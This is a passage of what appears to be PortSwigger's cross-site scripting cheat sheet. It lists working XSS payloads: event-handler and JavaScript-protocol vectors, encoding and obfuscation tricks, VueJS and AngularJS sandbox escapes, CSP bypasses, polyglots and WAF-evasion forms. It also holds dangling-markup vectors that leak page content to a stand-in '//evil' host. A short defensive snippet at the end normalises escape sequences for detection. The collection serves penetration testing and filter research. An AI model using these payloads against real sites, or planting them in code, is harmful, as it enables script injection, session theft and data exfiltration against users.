ontouchstart: Fires when the touch screen is touched (mobile devices only). <body ontouchstart=alert(1)>

onvolumechange: Requires a volume adjustment. <audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio>

onwheel: Fires when you use the mouse wheel. <body onwheel=alert(1)>

Restricted characters

No parentheses, using exception handling: <script>onerror=alert;throw 1</script>

No parentheses, using exception handling, no semicolons: <script>{onerror=alert}throw 1</script>

No parentheses, using exception handling, no semicolons, using expressions: <script>throw onerror=alert,1</script>

No parentheses, using exception handling and eval: <script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses, using exception handling and eval on Firefox: <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses, using ES6 hasInstance and instanceof with eval: <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses, using ES6 hasInstance and instanceof with eval, without dots: <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses, using location redirect: <script>location='javascript:alert\x281\x29'</script>

No parentheses, using location redirect, no strings: <script>location=name</script>

No parentheses, using template strings: <script>alert`1`</script>

No parentheses, using template strings and location hash: <script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces, using template strings and location hash: <script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event: <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event: <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute with JavaScript protocol: <iframe src=javascript:alert(1)>

Object data attribute with JavaScript protocol: <object data=javascript:alert(1)>

Embed src attribute with JavaScript protocol: <embed src=javascript:alert(1)>

A standard JavaScript protocol: <a href=javascript:alert(1)>XSS</a>

The protocol is not case sensitive: <a href=JaVaScript:alert(1)>XSS</a>

Characters \x01-\x20 are allowed before the protocol: <a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol: <a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon: <a href="javascript	:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol: <svg><a xlink:href=javascript:alert(1)><text x=20 y=20>XSS</text></a>

SVG animate tag using values: <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to: <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>

SVG set tag: <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src: <script src=data:text/javascript,alert(1)></script>

SVG script href attribute without closing script tag: <svg><script href=data:text/javascript,alert(1) />

SVG use element (Chrome/Firefox): <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL: <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs: <base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable: <math><x href=javascript:alert(1)>blah

Button and formaction: <form><button formaction=javascript:alert(1)>XSS

Input and formaction: <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action: <form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL: <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values: <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute: <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities: <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form: <form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: access key attributes can enable XSS on normally unexploitable elements: <input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Link elements: access key attributes can enable XSS on normally unexploitable elements: <link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage: <a href="" download=filename.html>Test</a>

Disable referrer using referrerpolicy: <img referrerpolicy=no-referrer src=//portswigger-labs.net>

Set window.name via parameter on the window.open function: <a href="" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>

Set window.name via name attribute in an <iframe> tag: <iframe name=alert(1) src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>

Set window.name via target attribute in a <base> tag: <base target=alert(1)><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag: <a target=alert(1) href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag: <img src=validimage.png width=10 height=10 usemap=#xss><map name=xss><area shape=rect coords=0,0,82,126 target=alert(1) href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>

Set window.name via target attribute in a <form> tag: <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target=alert(1)><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type=submit value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag (type submit): <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type=submit formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget=alert(1) value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag (type image): <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type=image src=validimage.png formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget=alert(1) value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain: <meta http-equiv=refresh content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7: <meta charset=UTF-7 /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7 via Content-Type: <meta http-equiv=Content-Type content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1: +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2: +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3: +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4: +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests: <meta http-equiv=Content-Security-Policy content=upgrade-insecure-requests>

Disable JavaScript via iframe sandbox: <iframe sandbox src=//portswigger-labs.net></iframe>

Disable referrer: <meta name=referrer content=no-referrer>

Encoding

Overlong UTF-8: \xC0\xBCscript>alert(1)</script> \xE0\x80\xBCscript>alert(1)</script> \xF0\x80\x80\xBCscript>alert(1)</script> \xF8\x80\x80\x80\xBCscript>alert(1)</script> \xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>

Unicode escapes: <script>\u0061lert(1)</script>

Unicode escapes, ES6 style: <script>\u{61}lert(1)</script>

Unicode escapes, ES6 style, zero padded: <script>\u{0000000061}lert(1)</script>

Hex encoding, JavaScript escapes: <script>eval('\x61lert(1)')</script>

Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon: <a href="&#106avascript:alert(1)">XSS</a> <a href="&#106;avascript:alert(1)">XSS</a>

SVG script with HTML encoding: <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon, provided the next character is not a-f0-9: <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a	avascript:alert(1)">XSS</a>

Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities: <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>

Obfuscation

Data protocol inside script src with base64: <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>

Data protocol inside script src with base64 and HTML entities: <script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>

Data protocol inside script src with base64 and URL encoding: <script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>

Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding: <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding: <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | {{{}.")));alert(1)//"}}
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a;}}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)

Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | {}.")));alert(1)//"
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//'
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv=refresh content="0; http://evil?

Img to pass markup through src attribute: <img src="//evil? <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value=XSS style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Use textarea to consume markup and post to an external site: <form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action=//evil target="

Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:`//"/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(PortSwiggerRes)//'>

WAF bypass global objects

XSS into a JavaScript string string concatenation(window)

window[ale+rt](window[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(self)

self[ale+rt](self[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(this)

this[ale+rt](this[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(top)

top[ale+rt](top[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(parent)

parent[ale+rt](parent[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(frames)

frames[ale+rt](frames[doc+ument][dom+ain])

XSS into a JavaScript string string concatenation(globalThis)

globalThis[ale+rt](globalThis[doc+ument][dom+ain])

XSS into a JavaScript string comment syntax(window)

window[fooalertbar](window[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])

XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(parent)

parent[fooalertbar](parent[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(frames)

frames[fooalertbar](frames[foodocumentbar][domain])

XSS into a JavaScript string comment syntax(globalThis)

globalThis[fooalertbar](globalThis[foodocumentbar][domain])

XSS into a JavaScript string, hex escape sequence (window)

window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (self)

self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (this)

this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (top)

top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (parent)

parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (frames)

frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (globalThis)

globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)

window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)

self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)

this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)

top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)

parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)

frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)

globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence (window)

window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (self)

self['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (this)

this['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (top)

top['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (parent)

parent['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (frames)

frames['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (globalThis)

globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape (window)

window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (self)

self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (this)

this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (top)

top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (parent)

parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (frames)

frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (globalThis)

globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property (window)

window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self)

self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this)

this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top)

top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent)

parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames)

frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis)

globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window)

window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self)

self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this)

this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top)

top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)

parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)

frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)

globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
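The hex, octal and unicode entries above all spell the same identifiers; a filter that matches on the literal text `alert` or `document` sees none of them. The following is an added example, not code from the cheat sheet, showing the normalisation step a detection rule or log-review script should apply before matching: it undoes the JavaScript string escape forms and then lists which properties a snippet reaches through `<global alias>['name']` bracket access. The function names and the `SAMPLES` strings are my own; the samples are the section's vectors written as JS source strings.

```javascript
// Added example (not from the cheat sheet): collapse the JavaScript string escapes
// used above so a detection rule sees the plain identifier. Names here are my own.

// Undo \u{...}, \uXXXX, \xXX and legacy octal escapes inside a snippet.
// Run this on string literals only: in a regex literal, \1 is a backreference, not octal.
function decodeJsEscapes(src) {
  return src
    .replace(/\\u\{([0-9a-fA-F]{1,10})\}/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-3][0-7]{2}|[0-7]{1,2})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// After normalising, return the property names reached through
// <global alias>['name'] bracket access, in source order.
function bracketAccessedGlobals(src) {
  const normalised = decodeJsEscapes(src);
  const re = /\b(?:window|self|this|top|parent|frames|globalThis)\[\s*(['"`])([^'"`]+)\1\s*\]/g;
  const names = [];
  let m;
  while ((m = re.exec(normalised)) !== null) names.push(m[2]);
  return names;
}

// Constructed samples: vectors from the section above, as JS source strings.
const SAMPLES = {
  hex: "window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e'])",
  octal: "top['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  unicode: "self['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  base64: "globalThis['\\x65\\x76\\x61\\x6c'](globalThis['\\x61\\x6c\\x65\\x72\\x74'](globalThis['\\x61\\x74\\x6f\\x62']('WFNT')))",
};

// Normalise every sample and list the globals it reaches.
function demo() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([k, v]) => [
      k,
      { normalised: decodeJsEscapes(v), globals: bracketAccessedGlobals(v) },
    ]),
  );
}
```

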